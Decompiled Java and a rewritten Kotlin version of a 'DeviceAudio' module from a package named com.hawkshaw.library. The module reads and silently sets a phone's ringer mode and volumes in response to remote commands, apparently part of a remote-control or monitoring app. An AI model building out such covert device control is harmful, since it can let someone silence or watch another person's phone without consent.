File: Dummy/hawkshaw/library/features/misc/DeviceAudioKt.java
package com.hawkshaw.library.features.misc;

import E.k;
import F3.b;
import Y1.K;
import android.media.AudioManager;
import com.hawkshaw.library.App;
import com.hawkshaw.library.datalayer.models.Command;
import com.hawkshaw.library.datalayer.network.twirp.interceptors.ContentNegotiationInterceptorKt;
import com.hawkshaw.library.logger.Logger;
import i.C0528x;

public final class DeviceAudioKt {
    private static final String TAG = "DeviceAudio";

    public /* synthetic */ class WhenMappings {
        public static final /* synthetic */ int[] $EnumSwitchMapping$0;
        public static final /* synthetic */ int[] $EnumSwitchMapping$1;

        /* JADX WARNING: Can't wrap try/catch for region: R(15:0|(2:1|2)|3|(2:5|6)|7|9|10|11|12|13|14|15|16|17|19) */
        /* JADX WARNING: Failed to process nested try/catch */
        /* JADX WARNING: Missing exception handler attribute for start block: B:11:0x002a */
        /* JADX WARNING: Missing exception handler attribute for start block: B:13:0x0032 */
        /* JADX WARNING: Missing exception handler attribute for start block: B:15:0x003b */
        static {
            /*
                com.hawkshaw.library.datalayer.models.Command$CommandType[] r0 = com.hawkshaw.library.datalayer.models.Command.CommandType.values()
                int r0 = r0.length
                int[] r0 = new int[r0]
                r1 = 1
                com.hawkshaw.library.datalayer.models.Command$CommandType r2 = com.hawkshaw.library.datalayer.models.Command.CommandType.PushDeviceAudio     // Catch:{ NoSuchFieldError -> 0x0010 }
                int r2 = r2.ordinal()     // Catch:{ NoSuchFieldError -> 0x0010 }
                r0[r2] = r1     // Catch:{ NoSuchFieldError -> 0x0010 }
            L_0x0010:
                r2 = 2
                com.hawkshaw.library.datalayer.models.Command$CommandType r3 = com.hawkshaw.library.datalayer.models.Command.CommandType.SetDeviceAudio     // Catch:{ NoSuchFieldError -> 0x0019 }
                int r3 = r3.ordinal()     // Catch:{ NoSuchFieldError -> 0x0019 }
                r0[r3] = r2     // Catch:{ NoSuchFieldError -> 0x0019 }
            L_0x0019:
                $EnumSwitchMapping$0 = r0
                com.hawkshaw.library.datalayer.models.Command$DeviceAudioRequest$RingerMode[] r0 = com.hawkshaw.library.datalayer.models.Command.DeviceAudioRequest.RingerMode.values()
                int r0 = r0.length
                int[] r0 = new int[r0]
                com.hawkshaw.library.datalayer.models.Command$DeviceAudioRequest$RingerMode r3 = com.hawkshaw.library.datalayer.models.Command.DeviceAudioRequest.RingerMode.Unknown     // Catch:{ NoSuchFieldError -> 0x002a }
                int r3 = r3.ordinal()     // Catch:{ NoSuchFieldError -> 0x002a }
                r0[r3] = r1     // Catch:{ NoSuchFieldError -> 0x002a }
            L_0x002a:
                com.hawkshaw.library.datalayer.models.Command$DeviceAudioRequest$RingerMode r1 = com.hawkshaw.library.datalayer.models.Command.DeviceAudioRequest.RingerMode.Normal     // Catch:{ NoSuchFieldError -> 0x0032 }
                int r1 = r1.ordinal()     // Catch:{ NoSuchFieldError -> 0x0032 }
                r0[r1] = r2     // Catch:{ NoSuchFieldError -> 0x0032 }
            L_0x0032:
                com.hawkshaw.library.datalayer.models.Command$DeviceAudioRequest$RingerMode r1 = com.hawkshaw.library.datalayer.models.Command.DeviceAudioRequest.RingerMode.Silent     // Catch:{ NoSuchFieldError -> 0x003b }
                int r1 = r1.ordinal()     // Catch:{ NoSuchFieldError -> 0x003b }
                r2 = 3
                r0[r1] = r2     // Catch:{ NoSuchFieldError -> 0x003b }
            L_0x003b:
                com.hawkshaw.library.datalayer.models.Command$DeviceAudioRequest$RingerMode r1 = com.hawkshaw.library.datalayer.models.Command.DeviceAudioRequest.RingerMode.Vibrate     // Catch:{ NoSuchFieldError -> 0x0044 }
                int r1 = r1.ordinal()     // Catch:{ NoSuchFieldError -> 0x0044 }
                r2 = 4
                r0[r1] = r2     // Catch:{ NoSuchFieldError -> 0x0044 }
            L_0x0044:
                $EnumSwitchMapping$1 = r0
                return
            */
            throw new UnsupportedOperationException("Method not decompiled: com.hawkshaw.library.features.misc.DeviceAudioKt.WhenMappings.<clinit>():void");
        }
    }

    private static final void getDeviceAudio() {
        AudioManager audioManager = (AudioManager) k.getSystemService(App.Companion.getContext(), AudioManager.class);
        if (audioManager != null) {
            int ringerMode = audioManager.getRingerMode();
            Command.DeviceAudioRequest deviceAudioRequest = new Command.DeviceAudioRequest(ringerMode != 0 ? ringerMode != 1 ? ringerMode != 2 ? Command.DeviceAudioRequest.RingerMode.Unknown : Command.DeviceAudioRequest.RingerMode.Normal : Command.DeviceAudioRequest.RingerMode.Vibrate : Command.DeviceAudioRequest.RingerMode.Silent, getDeviceAudio$getVolume(audioManager, 3), getDeviceAudio$getVolume(audioManager, 2), getDeviceAudio$getVolume(audioManager, 0), getDeviceAudio$getVolume(audioManager, 4));
            Logger logger = Logger.INSTANCE;
            b json = ContentNegotiationInterceptorKt.getJson();
            json.getClass();
            Logger.log$default(logger, TAG, "DeviceAudio: ".concat(json.b(Command.DeviceAudioRequest.Companion.serializer(), deviceAudioRequest)), false, 4, (Object) null);
        }
    }

    private static final int getDeviceAudio$getVolume(AudioManager audioManager, int i5) {
        return (audioManager.getStreamVolume(i5) * 100) / audioManager.getStreamMaxVolume(i5);
    }

    public static final void handleDeviceAudioCommand(Command command) {
        K.n(command, "command");
        int i5 = WhenMappings.$EnumSwitchMapping$0[command.getType().ordinal()];
        if (i5 == 1) {
            getDeviceAudio();
        } else if (i5 == 2) {
            setDeviceAudio(command.getSetDeviceAudioRequest());
        }
    }

    private static final void setDeviceAudio(Command.DeviceAudioRequest deviceAudioRequest) {
        AudioManager audioManager;
        if (deviceAudioRequest != null && (audioManager = (AudioManager) k.getSystemService(App.Companion.getContext(), AudioManager.class)) != null) {
            try {
                int i5 = WhenMappings.$EnumSwitchMapping$1[deviceAudioRequest.getRingerMode().ordinal()];
                int i6 = 1;
                if (i5 == 1) {
                    i6 = audioManager.getRingerMode();
                } else if (i5 == 2) {
                    i6 = 2;
                } else if (i5 == 3) {
                    i6 = 0;
                } else if (i5 != 4) {
                    throw new RuntimeException();
                }
                audioManager.setRingerMode(i6);
            } catch (Exception e5) {
                Logger.e$default(Logger.INSTANCE, TAG, C0528x.h("SetDeviceAudio: ", e5.getMessage()), (Exception) null, false, 12, (Object) null);
            }
            setDeviceAudio$setVolume(audioManager, 3, deviceAudioRequest.getMusicVolume());
            setDeviceAudio$setVolume(audioManager, 2, deviceAudioRequest.getRingVolume());
            setDeviceAudio$setVolume(audioManager, 0, deviceAudioRequest.getCallVolume());
            setDeviceAudio$setVolume(audioManager, 4, deviceAudioRequest.getAlarmVolume());
            Logger.v$default(Logger.INSTANCE, TAG, C0528x.b("SetDeviceAudio: RingerMode - ", audioManager.getRingerMode()), false, 4, (Object) null);
        }
    }

    private static final void setDeviceAudio$setVolume(AudioManager audioManager, int i5, int i6) {
        if (i6 >= 0) {
            audioManager.setStreamVolume(i5, (audioManager.getStreamMaxVolume(i5) * i6) / 100, 0);
        }
    }
}

File: app/src/main/java/com/hawkshaw/library/features/misc/DeviceAudioKt.kt
package com.hawkshaw.library.features.misc

import android.content.Context
import android.media.AudioManager
import android.util.Log // Added for logging
import com.hawkshaw.library.App
import com.hawkshaw.library.datalayer.models.Command
import com.hawkshaw.library.datalayer.network.twirp.interceptors.ContentNegotiationInterceptorKt
import com.hawkshaw.library.logger.Logger

private const val TAG = "DeviceAudio"

private object WhenMappings {
    val commandTypeMapping = Command.CommandType.entries.associateWith { type ->
        when (type) {
            Command.CommandType.PushDeviceAudio -> 1
            Command.CommandType.SetDeviceAudio -> 2
            else -> 0
        }
    }

    val ringerModeMapping = Command.DeviceAudioRequest.RingerMode.entries.associateWith { mode ->
        when (mode) {
            Command.DeviceAudioRequest.RingerMode.Unknown -> 1
            Command.DeviceAudioRequest.RingerMode.Normal -> 2
            Command.DeviceAudioRequest.RingerMode.Silent -> 3
            Command.DeviceAudioRequest.RingerMode.Vibrate -> 4
        }
    }
}

private fun getDeviceAudio() {
    Log.d(TAG, "[DEBUG] getDeviceAudio called.")
    val audioManager = App.getContext().getSystemService(Context.AUDIO_SERVICE) as? AudioManager
    if (audioManager != null) {
        Log.d(TAG, "[DEBUG] getDeviceAudio: AudioManager obtained.")
        val currentRingerModeInt = audioManager.ringerMode
        Log.d(TAG, "[DEBUG] getDeviceAudio: Current AudioManager ringerMode int: $currentRingerModeInt")
        val ringerMode = when (currentRingerModeInt) {
            AudioManager.RINGER_MODE_SILENT -> Command.DeviceAudioRequest.RingerMode.Silent
            AudioManager.RINGER_MODE_VIBRATE -> Command.DeviceAudioRequest.RingerMode.Vibrate
            AudioManager.RINGER_MODE_NORMAL -> Command.DeviceAudioRequest.RingerMode.Normal
            else -> Command.DeviceAudioRequest.RingerMode.Unknown
        }
        Log.d(TAG, "[DEBUG] getDeviceAudio: Mapped ringerMode: $ringerMode")

        val musicVol = getVolume(audioManager, AudioManager.STREAM_MUSIC)
        val ringVol = getVolume(audioManager, AudioManager.STREAM_RING)
        val callVol = getVolume(audioManager, AudioManager.STREAM_VOICE_CALL)
        val alarmVol = getVolume(audioManager, AudioManager.STREAM_ALARM)
        Log.d(TAG, "[DEBUG] getDeviceAudio: Volumes - Music: $musicVol, Ring: $ringVol, Call: $callVol, Alarm: $alarmVol")

        val deviceAudioRequest = Command.DeviceAudioRequest(
            ringerMode = ringerMode,
            musicVolume = musicVol,
            ringVolume = ringVol,
            callVolume = callVol,
            alarmVolume = alarmVol
        )
        Log.d(TAG, "[DEBUG] getDeviceAudio: Created DeviceAudioRequest: $deviceAudioRequest")

        val json = ContentNegotiationInterceptorKt.json
        // Existing Logger.d call is good for the final JSON
        Logger.d(TAG,
            "DeviceAudio: ${json.encodeToString(Command.DeviceAudioRequest.serializer(), deviceAudioRequest)}",
            false,
            4,
            null
        )
    } else {
        Log.w(TAG, "[DEBUG] getDeviceAudio: AudioManager was null.")
    }
}

private fun getVolume(audioManager: AudioManager, streamType: Int): Int {
    Log.d(TAG, "[DEBUG] getVolume called. streamType: $streamType")
    val streamVolume = audioManager.getStreamVolume(streamType)
    val maxVolume = audioManager.getStreamMaxVolume(streamType)
    Log.d(TAG, "[DEBUG] getVolume: streamType=$streamType, streamVolume=$streamVolume, maxVolume=$maxVolume")
    if (maxVolume == 0) { // Avoid division by zero
        Log.w(TAG, "[DEBUG] getVolume: maxVolume for streamType $streamType is 0. Returning 0.")
        return 0
    }
    val calculatedVolume = (streamVolume * 100 / maxVolume)
    Log.d(TAG, "[DEBUG] getVolume: streamType=$streamType, calculated percentage: $calculatedVolume")
    return calculatedVolume
}

fun handleDeviceAudioCommand(command: Command) {
    Log.d(TAG, "[DEBUG] handleDeviceAudioCommand called with command: $command")
    val commandMapping = WhenMappings.commandTypeMapping[command.type] ?: 0
    Log.d(TAG, "[DEBUG] handleDeviceAudioCommand: Command type mapping result: $commandMapping")
    when (commandMapping) {
        1 -> {
            Log.d(TAG, "[DEBUG] handleDeviceAudioCommand: Routing to getDeviceAudio().")
            getDeviceAudio()
        }
        2 -> {
            Log.d(TAG, "[DEBUG] handleDeviceAudioCommand: Routing to setDeviceAudio() with request: ${command.setDeviceAudioRequest}.")
            setDeviceAudio(command.setDeviceAudioRequest)
        }
        else -> {
            Log.w(TAG, "[DEBUG] handleDeviceAudioCommand: Unknown command type mapping: $commandMapping for command type: ${command.type}")
        }
    }
}

private fun setDeviceAudio(deviceAudioRequest: Command.DeviceAudioRequest?) {
    Log.d(TAG, "[DEBUG] setDeviceAudio called with request: $deviceAudioRequest")
    val audioManager = App.getContext().getSystemService(Context.AUDIO_SERVICE) as? AudioManager
    if (deviceAudioRequest != null && audioManager != null) {
        Log.d(TAG, "[DEBUG] setDeviceAudio: AudioManager and request are not null.")
        try {
            val ringerModeMappingValue = WhenMappings.ringerModeMapping[deviceAudioRequest.ringerMode] ?: 0
            Log.d(TAG, "[DEBUG] setDeviceAudio: RingerMode mapping result: $ringerModeMappingValue for requested mode: ${deviceAudioRequest.ringerMode}")
            val ringerModeToSet = when (ringerModeMappingValue) {
                1 -> audioManager.ringerMode // Unknown, keep current
                2 -> AudioManager.RINGER_MODE_NORMAL
                3 -> AudioManager.RINGER_MODE_SILENT
                4 -> AudioManager.RINGER_MODE_VIBRATE
                else -> {
                    Log.e(TAG, "[DEBUG] setDeviceAudio: Unknown ringer mode mapping: $ringerModeMappingValue. Defaulting to current ringer mode.")
                    audioManager.ringerMode // Default to current if mapping is unexpected
                }
            }
            Log.d(TAG, "[DEBUG] setDeviceAudio: Ringer mode to set (AudioManager constant): $ringerModeToSet")
            audioManager.ringerMode = ringerModeToSet
            Log.d(TAG, "[DEBUG] setDeviceAudio: Successfully set ringerMode to $ringerModeToSet. Current AudioManager ringerMode: ${audioManager.ringerMode}")
        } catch (e: Exception) {
            Log.e(TAG, "[DEBUG] setDeviceAudio: Exception while setting ringer mode", e) // Added for debugging
            Logger.e(TAG, "SetDeviceAudio: ${e.message}", e, false, 12, null) // Existing log
        }

        Log.d(TAG, "[DEBUG] setDeviceAudio: Setting volumes...")
        setVolume(audioManager, AudioManager.STREAM_MUSIC, deviceAudioRequest.musicVolume)
        setVolume(audioManager, AudioManager.STREAM_RING, deviceAudioRequest.ringVolume)
        setVolume(audioManager, AudioManager.STREAM_VOICE_CALL, deviceAudioRequest.callVolume)
        setVolume(audioManager, AudioManager.STREAM_ALARM, deviceAudioRequest.alarmVolume)

        // Existing Logger.v is good for this final state
        Logger.v(TAG, "SetDeviceAudio: RingerMode - ${audioManager.ringerMode}", false, 4, null)
    } else {
        Log.w(TAG, "[DEBUG] setDeviceAudio: deviceAudioRequest or AudioManager was null. Request: $deviceAudioRequest, AudioManager: $audioManager")
    }
}

private fun setVolume(audioManager: AudioManager, streamType: Int, volume: Int) {
    Log.d(TAG, "[DEBUG] setVolume called. streamType: $streamType, requested volume percentage: $volume")
    if (volume >= 0) {
        val maxVolume = audioManager.getStreamMaxVolume(streamType)
        Log.d(TAG, "[DEBUG] setVolume: streamType=$streamType, maxVolume=$maxVolume")
        if (maxVolume == 0 && volume > 0) { // Avoid division by zero if stream cannot have volume
             Log.w(TAG, "[DEBUG] setVolume: maxVolume for streamType $streamType is 0, but requested volume is $volume. Cannot set volume.")
             return
        }
        val volumeToSet = if (maxVolume == 0) 0 else (maxVolume * volume) / 100
        Log.d(TAG, "[DEBUG] setVolume: streamType=$streamType, calculated absolute volume to set: $volumeToSet")
        audioManager.setStreamVolume(
            streamType,
            volumeToSet,
            0 // Flags, 0 typically means no special behavior (e.g., don't show UI)
        )
        Log.d(TAG, "[DEBUG] setVolume: Successfully set volume for streamType $streamType to $volumeToSet. Current actual stream volume: ${audioManager.getStreamVolume(streamType)}")
    } else {
        Log.d(TAG, "[DEBUG] setVolume: streamType=$streamType, requested volume $volume is < 0. Skipping.")
    }
}
